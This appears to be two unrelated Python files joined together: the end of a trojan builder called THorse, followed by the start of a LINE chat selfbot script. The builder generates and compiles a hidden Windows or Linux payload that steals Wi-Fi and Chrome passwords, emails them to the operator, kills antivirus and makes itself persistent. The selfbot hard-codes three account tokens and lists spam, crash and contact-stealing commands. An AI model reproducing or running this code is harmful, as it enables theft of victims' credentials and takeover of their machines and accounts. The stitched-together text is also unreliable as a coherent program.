import mss, essential_generators, PyInstaller, six, cryptography
print(f"{Fore.GREEN}[+] All Dependencies are Installed on this system ;)\n")
except Exception as e:
print(f"[!] Error : {e}")
try:
print(f"{Fore.YELLOW}[*] Installing All Dependencies From Scratch...\n")
print(f'\n{Fore.WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
import pip
while 1:
pip.main(['install', 'mss'])
pip.main(['install', 'essential_generators'])
pip.main(['install', 'PyInstaller'])
pip.main(['install', 'six'])
pip.main(['install', 'python-xlib'])
pip.main(['install', 'cryptography'])
print(f'\n{Fore.WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
print(f"{Fore.GREEN}\n[+] Dependencies installed correctly ;)\n")
break
except:
print(f"{Fore.RED}\n[!] Unable to Install Dependencies, Please Try Again :(\n")
quit()
def create_trojan(file_name, email, password, ip, port, time_persistent, legitimate_file=None):
with open(file_name, "w+") as file:
file.write("import payload, win32event, winerror, win32api\n")
if arguments.stealer:
file.write("import password_stealer\n")
if arguments.bind or arguments.stealer:
file.write("import threading\n\n")
if arguments.bind != None:
#Codes to Run, Legitimate File on Front End
file.write("import subprocess, sys\n\n")
file.write("def run_front_file():\n")
file.write(f"\tfile_name = sys._MEIPASS.replace('\\\\', '/') + \"/{legitimate_file}\" \n")
file.write(f"\tsubprocess.call(file_name, shell=True)\n\n")
#Running Front End File on Different Thread
file.write("t1 = threading.Thread(target=run_front_file)\n")
file.write("t1.start()\n\n")
#Below Codes will check for already running instance,
file.write("\nmutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')\n\n")
if arguments.stealer:
#Saved Password Stealer
file.write("def steal():\n")
file.write(f"\tsteal = password_stealer.SendPass(\'{email}\', \'{password}\')\n")
file.write(f"\tsteal.get_wifi_creds()\n")
file.write(f"\tprint(\"[+] Wifi Password Send Successfully!\")\n")
file.write(f"\tsteal.get_chrome_browser_creds()\n")
file.write(f"\tprint(\"[+] Chrome Browser Password Send Successfully!\")\n\n")
file.write("def check_and_start():\n")
file.write("\tif win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:\n")
file.write("\t\tmutex = None\n")
file.write("\t\tprint(\"[+] Disabling THorse: Already Running\")\n")
file.write("\telse:\n") # if no instance running, going to run THorse
if arguments.stealer:
file.write(f"\t\tt2 = threading.Thread(target=steal)\n") #Making Stealer Thread
file.write(f"\t\tt2.start()\n\n") #Starting Thread
file.write(f"\t\ttHorse = payload.MainPayload(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
if arguments.kill_av != None and arguments.kill_av != "":
file.write(f"\t\ttHorse.kill_av({arguments.kill_av})\n")
else:
file.write("\t\ttHorse.kill_av()\n")
file.write(f"\t\ttHorse.become_persistent({time_persistent})\n")
file.write("\t\ttHorse.start()\n\n")
file.write("check_and_start()\n")
def create_trojan_linux(file_name, email, password, ip, port, time_persistent):
with open(file_name, "w+") as file:
file.write("import payload\n")
file.write(f"tHorse = payload.MainPayload(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
file.write(f"tHorse.become_persistent({time_persistent})\n")
file.write("tHorse.start()\n\n")
def obfuscating_payload(file_name):
gen = DocumentGenerator()
text = "#" + gen.sentence()
with open(file_name, "a") as file:
file.write(text)
def compile_for_windows(file_name):
if arguments.debug:
if arguments.bind != None and arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.bind != None:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
else:
if arguments.bind != None and arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.bind != None:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def compile_for_linux(file_name):
if arguments.debug:
subprocess.call(f"pyinstaller --onefile --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"pyinstaller --onefile --noconsole --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def del_junk_file(file_name):
try:
if platform.system() == 'Windows':
build = os.getcwd() + "\\build"
file_name = os.getcwd() + f"\\{file_name}"
pycache = os.getcwd() + "\\__pycache__"
os.remove(file_name)
os.remove(file_name + ".spec")
shutil.rmtree(build)
shutil.rmtree(pycache)
if platform.system() == 'Linux':
file_spec = file_name + ".spec"
os.system(f"rm -r build/ __pycache__/ {file_spec} {file_name}")
except Exception:
pass
def exit_greet():
try:
os.system('cls')
except Exception as e:
os.system('clear')
del_junk_file(arguments.output)
print(Fore.GREEN + '''Happy Hacking ~THorse!\n''' + Style.RESET_ALL)
quit()
if __name__ == '__main__':
if Attacker_System == 'Windows':
try:
shutil.rmtree(os.getcwd() + "\\dist")
except Exception:
pass
else:
try:
os.system('rm -Rf dist')
except Exception:
pass
try:
print(banners.get_banner())
print(f"\t\t{Fore.YELLOW}Author: {Fore.GREEN}Pushpender | {Fore.YELLOW}GitHub: {Fore.GREEN}@PushpenderIndia\n")
arguments = get_options()
if arguments.icon == None:
arguments.icon = input(f'{Fore.RED}[!] Please Specify Icon Path {Fore.WHITE}[{Fore.GREEN}LEAVE BLANK to SET icon/exe.ico as icon{Fore.WHITE}] : ')
if arguments.icon == "":
arguments.icon = "icon/exe.ico"
if not os.path.exists(PYTHON_PYINSTALLER_PATH.replace("wine ", "")) and arguments.windows:
PYTHON_PYINSTALLER_PATH = get_python_pyinstaller_path()
if PYTHON_PYINSTALLER_PATH == "UnableToFind":
print(f'{Fore.RED}[!] Default Pyinstaller Path inside Wine Directory is Incorrect')
print(f'{Fore.RED}[!] {Fore.WHITE}[Please Update Line 19 Later] [{Fore.RED}DefautPath: {Fore.WHITE}~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe]')
PYTHON_PYINSTALLER_PATH = "wine "
PYTHON_PYINSTALLER_PATH += input(f'\n{Fore.WHITE}[?] Enter pyinstaller.exe path manually : ')
print(f'\n{Fore.GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]{Fore.GREEN}')
print(f'\n {Fore.YELLOW}Email:{Fore.RED} ' + arguments.email)
print(f' {Fore.YELLOW}Password:{Fore.RED} ' + arguments.password)
print(f' {Fore.YELLOW}IP Address:{Fore.RED} ' + arguments.ip)
print(f' {Fore.YELLOW}Port:{Fore.RED} ' + arguments.port)
print(f' {Fore.YELLOW}Output Evil File Name:{Fore.RED} ' + arguments.output)
print(f' {Fore.YELLOW}Becoming Persistence After:{Fore.RED} ' + str(arguments.time_persistent) + f'{Fore.YELLOW} seconds')
print(f' {Fore.YELLOW}Icon Path:{Fore.RED} ' + arguments.icon)
print(f' {Fore.YELLOW}Pyinstaller Path:{Fore.RED} ' + PYTHON_PYINSTALLER_PATH + f" {Fore.YELLOW}[{Fore.WHITE}Manually Update line: 15 & 19, If this PATH is Incorrect{Fore.YELLOW}]")
if arguments.bind != None:
print(f' {Fore.YELLOW}Binding To [{Fore.RED}Legitimate File Path{Fore.YELLOW}]:{Fore.RED} ' + str(arguments.bind))
print(f'\n{Fore.GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
ask = input(f'\n{Fore.WHITE}[?] These info above are correct? (y/n) : ')
if ask.lower() == 'y':
pass
else:
arguments.email = input('\n[?] Type your gmail to receive logs: ')
arguments.password = input('[?] Type your gmail password: ')
arguments.ip = input('[?] LHOST or IP Address: ')
arguments.port = int(input('[?] LPORT: '))
arguments.time_persistent = int(input('[?] Time After which it should become persistence; [In Seconds]: '))
arguments.output = input('[?] Output Evil File Name: ')
arguments.icon = input(f'[?] Icon Path [{Fore.RED}If Present In This Directory, then just type Name{Fore.WHITE}]: ')
if arguments.bind != None:
arguments.bind = input(f'[?] Path of Legitimate File [{Fore.RED}.exe is Recommended{Fore.WHITE}]: ')
check_dependencies()
print(f"\n{Fore.YELLOW}[*] Generating Please wait for a while...{Fore.MAGENTA}\n")
if Attacker_System == 'Linux':
if arguments.linux:
create_trojan_linux(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent)
if Attacker_System == 'Windows' and arguments.linux:
print(f"{Fore.RED}[!] Linux payload can't be compiled from windows machine")
print(f"{Fore.YELLOW}[*] Making Payload for Windows ...\n")
if arguments.windows:
create_trojan(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent, arguments.bind)
obfuscating_payload(arguments.output)
encrypting_code = encrypt_code.Encrypt()
encrypting_code.encrypt(arguments.output)
print(f"{Fore.YELLOW}[*] Compiling your payload, Please Wait for a while...")
print(f"{Fore.MAGENTA}")
if arguments.windows:
compile_for_windows(arguments.output)
elif arguments.linux:
compile_for_linux(arguments.output)
else:
print(f"{Fore.RED}[!] Please Specify {Fore.YELLOW}-w{Fore.RED} for {Fore.GREEN}WINDOWS{Fore.RED} or {Fore.YELLOW}-l{Fore.RED} for {Fore.GREEN}LINUX{Fore.RED} payload generation")
print(f"\n{Fore.YELLOW}[*] Deleting Junk Files...")
del_junk_file(arguments.output)
print(f"{Fore.GREEN}[+] Junk Files Removed Successfully!")
if os.path.exists(f'dist/{arguments.output}.exe') or os.path.exists(f'dist/{arguments.output}'):
print(f"\n{Fore.GREEN}[+] Generated Successfully!\n")
print(f"\n\n{Fore.RED}[***] Don't forget to allow less secure applications in your Gmail account.")
print(f"{Fore.GREEN}Use the following link to do so https://myaccount.google.com/lesssecureapps")
print(f"\n{Fore.RED} :O-) TIP{Fore.YELLOW} : USE ICONS from {Fore.RED}icon{Fore.YELLOW} folder like this >> {Fore.RED}--icon icon/exe.ico")
else:
print(f"\n{Fore.RED}[!] Failed To Generate Your Payload :(, Please Try Again!\n")
print(f"\n{Fore.GREEN}[:D] Please Contact us on https://github.com/PushpenderIndia/thorse\n")
except KeyboardInterrupt:
exit_greet()
|
sbwib1.py
|
# -*- coding: utf-8 -*-
import WIB
from WIB.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
# LINE client sessions used throughout the script (kr1 = primary, kr2/kr3 = assist bots).
# SECURITY NOTE(review): auth tokens are hard-coded in plain text here -
# rotate them and load from the environment/a config file instead.
kr1 = WIB.LINE()
kr1.login(token="EpozTCA86zkFsWQZ5eZb.Fg2xAK8+c6My92znQ5+akW.RjjUWkkHKma2WGkYtbnlLXWN8L3uTDBnI8rmH0wSpoA=")#1 => main account
kr1.loginResult()
kr2 = WIB.LINE()
kr2.login(token="Ep3KDaVSZdCgAk4V1VH6.xuC8K6+gzJsmen91eTrSPG.blTStQRf9wqptb2xs0DbqiVD4HMbvcv04Ny3sSiQIr0=")#2 => assistant
kr2.loginResult()
kr3 = WIB.LINE()
kr3.login(token="Epg051T3CRWANqSrI394.CKP6GP5GmFyfYuKxouLRXa.ucpPBtY68YHrifaA4MsKXRryYT3N/XnI6ijXgoRZU2E=")#3 => assistant
kr3.loginResult()
# Python 2 only from here down: print statement plus reload()/setdefaultencoding().
print "╔═════════════════════════\n╔════════════════════════\n╠❂➣ SUKSES LOGIN WIB\n╚════════════════════════\n╚═════════════════════════"
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̷̝̝͖̙͚͙͕̼̰͓̊̉̈̒͗̈́ ☜☆
╠═════════════════
╠[➣ Oswib1
╠[➣ Oswib2
╠[➣ Oswib3
╠[➣ Oswib4
╠[➣ Cipok
╠[➣ Gcreator
╠[➣ Idline (text)
╠[➣ Time
╠[➣ Salam1/Salam2
╠[➣ Creator
╠[➣ Kelahiran
╠[➣ Kalender/waktu
╠[➣ Say
╠[➣ Gift8
╠[➣ Gift/Gift1/2/3
╠[➣ Reinvite
╠[➣ Time
╠[➣ Kapan
╠[➣ Apakah
╠[➣ Facebook
╠[➣ Youtube
╠[➣ Yt
╠[➣ Music
╠[➣ Google (text)
╠[➣ Playstore (text)
╠[➣ Instagram (username)
╠[➣ Wikipedia (text)
╠[➣ Image (text)
╠[➣ Lirik (text)
╠[➣ Say-id
╠[➣ Say-en
╠[➣ Say-jp
╠[➣ Say-ar
╠[➣ Say-ko
╠[➣ Welcome
╠[➣ Nah
╠[➣ Absen
╠[➣ Runtime
╠[➣ Speed
╠[➣ Intip on/off
╚════════════
"""
helpself ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̷̝̝͖̙͚͙͕̼̰͓̊̉̈̒͗̈́2̜̪̠̦̠̭̥̬̉̆̀͗͒̂͗̊̚͞ ☜☆
╠═════════════════
╠[➣ Cctv on/off
╠[➣ Intip/Ciduk
╠[➣ Setimage: (link)
╠[➣ Papimage
╠[➣ Setvideo: (link)
╠[➣ Papvideo
╠[➣ mymid
╠[➣ Getcover @
╠[➣ Myname
╠[➣ Mybot
╠[➣ Mybio
╠[➣ Mypict
╠[➣ Myvid
╠[➣ Urlpict
╠[➣ Mycover
╠[➣ Urlcover
╠[➣ Getmid @
╠[➣ Getinfo @
╠[➣ Getbio @
╠[➣ Getname @
╠[➣ Getprofile @
╠[➣ Getcontact @
╠[➣ Getpict @
╠[➣ Getvid @
╠[➣ Picturl @
╠[➣ Getcover @
╠[➣ Coverurl @
╠[➣ Mycopy @
╠[➣ Mybackup
╠[➣ Testext: (text)
╠[➣ Spam change:
╠[➣ Spam add:
╠[➣ Spam:
╠[➣ Spam (text)
╠[➣ Steal contact
╠[➣ Auto add
╠[➣ Spam change:
╠[➣ Spam add:
╠[➣ Spam:
╠[➣ Spam txt/on/jml
╠[➣ Micadd @
╠[➣ Micdel @
╠[➣ Miclist
╠[➣ Mimic target @
╠[➣ Mimic on/off
╚════════════
"""
helpset ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̷̝̝͖̙͚͙͕̼̰͓̊̉̈̒͗̈́3̶̖̲̥̠̘̉͋̒̀̉͒̍̀͢͢͟͜͜͠͠☜☆
╠═════════════════
╠[➣ Gurl
╠[➣ Grup cancel:
╠[➣ Share on/off
╠[➣ Poto on/off
╠[➣ Sambut on/off
╠[➣ Pergi on/off
╠[➣ Tag on/off
╠[➣ Tag2 on/off
╠[➣ Contact on/off
╠[➣ Autojoin on/off
╠[➣ Autoleave on/off
╠[➣ Autoadd on/off
╠[➣ Like friend
╠[➣ Like me
╠[➣ Link on/off
╠[➣ Simisimi on/off
╠[➣ Autoread on/off
╠[➣ Update
╠[➣ Pesan set:
╠[➣ Coment Set:
╠[➣ Comment on/off
╠[➣ Comment
╠[➣ Com hapus Bl
╠[➣ Com Bl cek
╠[➣ Jam on/off
╠[➣ Jam say:
╚════════════
"""
helpgrup ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̝̝͖̙͚͙͕̼̰̜̪̠̦̠̭̥̬̊̉̈̒͗̈́̉̆̀͗͒̂͗̊̚͞4̧̳͙̰̼̫̟́̃̄͋̊͘͢ ☜☆
╠═════════════════
╠[➣ Mode on/off
╠[➣ Protect on/off
╠[➣ Qr on/off
╠[➣ Invite on/off
╠[➣ Cancel on/off
╠[➣ Link on
╠[➣ Url
╠[➣ Cancel
╠[➣ Gcreator
╠[➣ Kick @
╠[➣ Cium @
╠[➣ Gname:
╠[➣ Gbroadcast:
╠[➣ Cbroadcast:
╠[➣ Infogrup
╠[➣ Gruplist
╠[➣ Friendlist
╠[➣ Blacklist
╠[➣ Ban @
╠[➣ Unban @
╠[➣ Clearban
╠[➣ Banlist
╠[➣ Contact ban
╠[➣ Midban
╠[➣ Kick @
╠[➣ Cium @
╠[➣ Cancel
╠[➣ Friendpp:
╠[➣ Checkmid:
╠[➣ Checkid:
╠[➣ Friendlist
╠[➣ Memlist
╠[➣ Friendinfo:
╠[➣ Friendpict:
╠[➣ Friendlistmid
╠[➣ Blocklist
╠[➣ Gruplist
╠[➣ Gruplistmid
╠[➣ Grupimage:
╠[➣ Grupname
╠[➣ Grupid
╠[➣ Grupinfo:
╠[➣ Gcreator
╠[➣ Invite:gcreator
╠[➣ Gname:
╠[➣ Infogrup
╠[➣ Grup id
╠[➣ Glist
╠[➣ Gcancel
╠[➣ Asup
╠[➣ Bye
╠[➣ Ats
╠[➣ Cctv on/off
╠[➣ Ciduk/Intip
╠[➣ Gbroadcast:
╠[➣ Cbroadcast:
╠[➣ Getgrup image
╠[➣ Urlgrup image
╠[➣ Status
╠[➣ Ban @
╠[➣ Unban @
╠[➣ Ban:
╠[➣ Unban:
╠[➣ Clear
╠[➣ Ban:on
╠[➣ Unban:on
╠[➣ Banlist
╠[➣ Conban/Contact ban
╠[➣ Midban
╠[➣ Scan blacklist
╠[➣ Bcast
╚════════════
"""
helprhs ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̝̝͖̙͚͙͕̼̰̜̪̠̦̠̭̥̬̊̉̈̒͗̈́̉̆̀͗͒̂͗̊̚͞5̶̧͖̖̰͕̗̳͙̰̼̫̟̏̃̾͐̓̑̾́̃̄͋̊̚̕͘͢͞ ☜☆
╠═════════════════
╠[➣ Byebye
╠[➣ Ifconfig
╠[➣ System
╠[➣ Kernel
╠[➣ Cpu
╠[➣ Restart
╠[➣ Turn off
╠[➣ Speed
╠[➣ Crash
╠[➣ Crash kontak @
╠[➣ Attack
╠[➣ Spamcontact @
╠[➣ Spamtag @
╠[➣ Pulang
╠[➣ Wib/cab1/2
╠[➣ Logo
╠[➣ Restart
╠[➣ Invite/Undang/Jepit
╠[➣ Namebot:(txt)
╠[➣ Namebot1/2/3/4/5:
╠[➣ Biobot: (txt)
╠[➣ Gcreator:inv
╠[➣ Gcreator:kick
╠[➣ Spamtag @
╠[➣ Cium
╠[➣ Glist
╠[➣ Glist2
╠[➣ Asupka
╠[➣ Bye
╠[➣ Megs
╠[➣ !megs
╠[➣ Recover
╠[➣ Spin
╠[➣ Removechat
╠[➣ Muach
╠[➣ Salam3
╚════════════
"""
# Bot roster and permission lists. KAC is the pool the handlers pick from at random.
KAC=[kr1,kr2,kr3]
mid = kr1.getProfile().mid
Amid = kr2.getProfile().mid
Bmid = kr3.getProfile().mid
midd1=[""]
midd2=[""]
midd3=[""]
Bots=[mid,Amid,Bmid]
owner=["u0710a42a75e0a476ad687639db8c069c"]
admin=["u0710a42a75e0a476ad687639db8c069c",mid,Amid,Bmid]
# Global feature-flag / mutable state table consulted by the bot() handler.
wait = {
'likeOn':False,
'detectMention':True,
'potoMention':False,
'kickMention':False,
'steal':False,
'stiker':False,
'pap':{},
'invite':{},
'invite2':{},
'spam':{},
'contact':False,
'autoJoin':False,
'autoCancel':{"on":False,"members":5},
'leaveRoom':False,
'timeline':False,
'autoAdd':False,
'message':"""""",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By Strangler\n »»» http://line.me/ti/p/~nesawiraguna «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cNames1":"",
"cNames2":"",
"cNames3":"",
"Wc":False,
"Wc2":False,
"Lv":False,
"autoKick":False,
"winvite":False,
"MENTION":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"QrProtect":False,#<====
"MProtection":False,
"Protectguest":False,
"Protectcancel":False,
"Protectgr":False,
"Sider":{},
"intipp":{},
"pname":{},
"pro_name":{}
}
# Read-receipt tracking state (who has read messages in watched chats).
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
# Mimic feature: echo messages of targeted users.
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
# "Sider"/lurker detection state.
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
ngintip = {
"intip":{},
"target":{},
"toong":{}
}
setTime = {}
# NOTE(review): the empty dict above is dead - setTime is immediately rebound
# to alias wait2['setTime'].
setTime = wait2['setTime']
# NOTE(review): contact/mybackup are re-assigned three times in a row, so only
# the kr3 profile fetched last is actually kept; the kr1/kr2 fetches are wasted.
contact = kr1.getProfile()
mybackup = kr1.getProfile()
contact = kr2.getProfile()
mybackup = kr2.getProfile()
contact = kr3.getProfile()
mybackup = kr3.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = kr1.getProfile()
backup = kr1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kr1.getProfile()
profile = kr1.getProfile()
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
# Start time for the "Runtime" command, default image URL, and a browser UA string.
mulai = time.time()
url123 = ("https://scontent.fcgk2-1.fna.fbcdn.net/v/t1.0-9/26229822_136061360519754_2383391381158562768_n.jpg?oh=5b629e008c344ab9120798423a1fe9fe&oe=5ABEC25F")
agent = {'User-Agent' : "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"}
def translate(to_translate, to_language="auto", language="auto"):
    """Translate text by scraping Google Translate's mobile page.

    The source language is always auto-detected (the `language` parameter is
    accepted for compatibility but ignored, as in the original).
    """
    # Spaces become '+' in the query string of the mobile endpoint.
    query = to_translate.replace(" ", "+")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % ("auto", to_language, query)
    headers = {'User-Agent': 'Mozilla/5.0'}
    marker = 'class="t0">'
    req = urllib2.Request(url, headers=headers)
    html = urllib2.urlopen(req).read()
    # The translated text sits immediately after the marker, up to the next tag.
    tail = html[html.find(marker) + len(marker):]
    return tail.split("<")[0]
def download_page(url):
    """Fetch *url* with a browser User-Agent and return the page body.

    Uses urllib.request on Python 3 and urllib2 on Python 2. On Python 3 a
    failure prints the error and returns None; on Python 2 it returns the
    string "Page Not found" (preserving the original contract).
    """
    version = (3, 0)
    cur_version = sys.version_info
    if cur_version >= version:  # Python 3.0 or above
        # fixed: was `import urllib,request` / `urllib,request.Request(...)`,
        # which is a tuple expression, not the urllib.request module.
        import urllib.request
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req = urllib.request.Request(url, headers=headers)
            resp = urllib.request.urlopen(req)
            respData = str(resp.read())
            return respData
        except Exception as e:
            print(str(e))
    else:  # Python 2.x
        import urllib2
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
            req = urllib2.Request(url, headers=headers)
            response = urllib2.urlopen(req)
            page = response.read()
            return page
        except Exception:  # narrowed from a bare except; still best-effort
            return "Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
    """Collect every image URL from *page* by repeated scanning.

    Delegates to _images_get_next_item until it reports no more links.
    """
    links = []
    while True:
        link, offset = _images_get_next_item(page)
        if link == "no_links":
            break
        links.append(link)
        # Throttle so image downloads are not requested too quickly.
        time.sleep(0.1)
        # Continue scanning after the entry just consumed.
        page = page[offset:]
    return links
#def autolike():
# for zx in range(0,100):
# hasil = kr1.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea ««")
# print "DiLike"
# except:
# pass
# else:
# print "Sudah DiLike"
# time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
#def autolike():
# for zx in range(0,100):
# hasil = kr1.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea ««")
# print "Like"
# except:
# pass
# else:
# print "Already Liked"
#time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
def yt(query):
    """Search YouTube for *query*; return a list of 'youtu.be…' links.

    An empty query falls back to the default search term. Playlist links
    (containing '&list=') are skipped.
    """
    with requests.session() as s:
        results = []
        if query == "":
            query = "S1B tanysyz"  # default search term
        s.headers['user-agent'] = 'Mozilla/5.0'
        resp = s.get('http://www.youtube.com/results', params={'search_query': query})
        soup = BeautifulSoup(resp.content, 'html5lib')
        for anchor in soup.select('.yt-lockup-title > a[title]'):
            href = anchor['href']
            if '&list=' not in href and 'watch?v' in href:
                results += ['youtu.be' + href.replace('watch?v=', '')]
        return results
def waktu(secs):
    """Format a duration in seconds as 'HH Jam MM Menit SS Detik'."""
    hours, remainder = divmod(secs, 3600)
    mins, secs = divmod(remainder, 60)
    return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def upload_tempimage(client):
    '''
    Upload a picture of a kitten. We don't ship one, so get creative!
    '''
    # NOTE(review): `album` and `image_path` are not defined anywhere in this
    # file - calling this raises NameError; confirm where these globals are
